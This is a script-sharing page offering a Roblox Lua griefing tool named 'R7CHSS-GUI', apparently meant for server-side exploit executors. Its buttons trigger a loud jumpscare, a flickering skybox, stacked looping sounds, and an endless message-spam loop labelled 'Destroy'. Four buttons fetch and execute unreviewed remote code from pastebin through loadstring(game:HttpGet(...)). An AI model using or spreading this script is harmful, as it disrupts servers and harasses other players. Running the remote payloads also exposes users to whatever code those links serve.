ADVERTISEMENTREMOVE ADS
R7CHSS-GUI
46,655 views
Universal script•
9 months ago

Script Preview
ADVERTISEMENTREMOVE ADS
217 Lines • 6.74 KiB
local ScreenGui = Instance.new("ScreenGui")
local MainFrame = Instance.new("Frame")
local Title = Instance.new("TextLabel")
local ScriptMaker = Instance.new("TextLabel")
local TweenService = game:GetService("TweenService")
ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
MainFrame.Size = UDim2.new(0, 400, 0, 320)
MainFrame.Position = UDim2.new(0.5, -200, 0.5, -160)
MainFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
MainFrame.BorderSizePixel = 5
MainFrame.Parent = ScreenGui
Title.Size = UDim2.new(1, 0, 0, 40)
Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Title.Text = "SS-GUI"
Title.TextColor3 = Color3.fromRGB(255, 0, 0)
Title.Font = Enum.Font.Cartoon
Title.TextScaled = true
Title.Parent = MainFrame
local buttonCount = 8
local buttonWidth, buttonHeight = 85, 40
local spacingX, spacingY = 10, 10
local startX, startY = 15, 50
local buttons = {}
local buttonNames = {
"Skybox", "Jumpscare", "Particle", "Music",
"DecalSpam", "RTX", "Destroy", "Beseaple"
}
for i = 1, buttonCount do
local row = math.floor((i - 1) / 4)
local col = (i - 1) % 4
local Button = Instance.new("TextButton")
Button.Size = UDim2.new(0, buttonWidth, 0, buttonHeight)
Button.Position = UDim2.new(0, startX + col * (buttonWidth + spacingX), 0, startY + row * (buttonHeight + spacingY))
Button.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
Button.Text = buttonNames[i]
Button.Parent = MainFrame
buttons[i] = Button
end
ScriptMaker.Size = UDim2.new(1, 0, 0, 40)
ScriptMaker.Position = UDim2.new(0, 0, 1, -40)
ScriptMaker.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ScriptMaker.Text = "bypass"
ScriptMaker.TextColor3 = Color3.fromRGB(255, 0, 0)
ScriptMaker.Font = Enum.Font.Cartoon
ScriptMaker.TextScaled = true
ScriptMaker.Parent = MainFrame
local UserInputService = game:GetService("UserInputService")
local dragging, dragInput, dragStart, startPos
MainFrame.InputBegan:Connect(function(input)
if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
dragging = true
dragStart = input.Position
startPos = MainFrame.Position
end
end)
MainFrame.InputChanged:Connect(function(input)
if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
dragInput = input
end
end)
MainFrame.InputEnded:Connect(function(input)
if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
dragging = false
end
end)
UserInputService.InputChanged:Connect(function(input)
if input == dragInput and dragging then
local delta = input.Position - dragStart
local newPos = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
local tweenInfo = TweenInfo.new(0.3, Enum.EasingStyle.Sine, Enum.EasingDirection.Out)
local tween = TweenService:Create(MainFrame, tweenInfo, {Position = newPos})
tween:Play()
end
end)
-- **Função SKYBOX**
local function startSkyboxLoop()
local Lighting = game:GetService("Lighting")
local function changeSkybox(id)
if not Lighting:FindFirstChild("CustomSky") then
local sky = Instance.new("Sky")
sky.Name = "CustomSky"
sky.Parent = Lighting
end
local sky = Lighting:FindFirstChild("CustomSky")
sky.SkyboxBk = "rbxassetid://" .. id
sky.SkyboxDn = "rbxassetid://" .. id
sky.SkyboxFt = "rbxassetid://" .. id
sky.SkyboxLf = "rbxassetid://" .. id
sky.SkyboxRt = "rbxassetid://" .. id
sky.SkyboxUp = "rbxassetid://" .. id
end
while true do
changeSkybox("125990366514894")
wait(1)
changeSkybox("131909040076481")
wait(1)
end
end
-- **Função Jumpscare**
local function triggerJumpscare()
local Players = game:GetService("Players")
local player = Players.LocalPlayer
local imageId = "rbxassetid://122183721543392"
local soundId = "rbxassetid://6129291390"
local screenGui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
local imageLabel = Instance.new("ImageLabel", screenGui)
imageLabel.Size = UDim2.new(1, 0, 1, 0)
imageLabel.Image = imageId
imageLabel.BackgroundTransparency = 1
local sound = Instance.new("Sound", player:WaitForChild("PlayerGui"))
sound.SoundId = soundId
sound.Volume = 10
for i = 1, 20 do
sound:Play()
wait(0.05)
end
wait(8)
screenGui:Destroy()
end
-- **Função Particle**
local function loadParticleScript()
loadstring(game:HttpGet("https://pastebin.com/raw/GsZDNV5G"))()
end
-- **Função Music**
local function playMusic()
local SoundService = game:GetService("SoundService")
local function playMultipleSoundsInLoop(soundId, volume, times)
for i = 1, times do
local sound = Instance.new("Sound")
sound.SoundId = "rbxassetid://" .. soundId
sound.Volume = volume
sound.Looped = true
sound.Parent = SoundService
sound:Play()
end
end
playMultipleSoundsInLoop(1839247124, 10, 20)
end
-- **Função DecalSpam**
local function loadDecalSpam()
loadstring(game:HttpGet("https://pastebin.com/raw/qch37ub5"))()
end
-- **Função RTX**
local function loadRTX()
loadstring(game:HttpGet("https://pastebin.com/raw/Jc0Mc6YQ"))()
end
-- **Função Destroy**
local function destroyServer()
local sound = Instance.new("Sound", game.Workspace)
sound.SoundId = "rbxassetid://104181508980428"
sound.Volume = 10
sound.PlaybackSpeed = 0.1
sound.Ended:Connect(function()
sound:Play()
end)
sound:Play()
while true do
for i = 1, 100 do
local m = Instance.new("Message", game.Workspace)
m.Text = "R7CH destroyed server - Message " .. math.random(1, 99999)
task.delay(5, function()
m:Destroy()
end)
end
task.wait(1)
end
end
-- **Função Beseaple**
local function loadBeseaple()
loadstring(game:HttpGet("https://pastebin.com/raw/VJsicAUr"))()
end
buttons[1].MouseButton1Click:Connect(startSkyboxLoop)
buttons[2].MouseButton1Click:Connect(triggerJumpscare)
buttons[3].MouseButton1Click:Connect(loadParticleScript)
buttons[4].MouseButton1Click:Connect(playMusic)
buttons[5].MouseButton1Click:Connect(loadDecalSpam)
buttons[6].MouseButton1Click:Connect(loadRTX)
buttons[7].MouseButton1Click:Connect(destroyServer)
buttons[8].MouseButton1Click:Connect(loadBeseaple)
ADVERTISEMENTREMOVE ADS
ADVERTISEMENTREMOVE ADS







Comments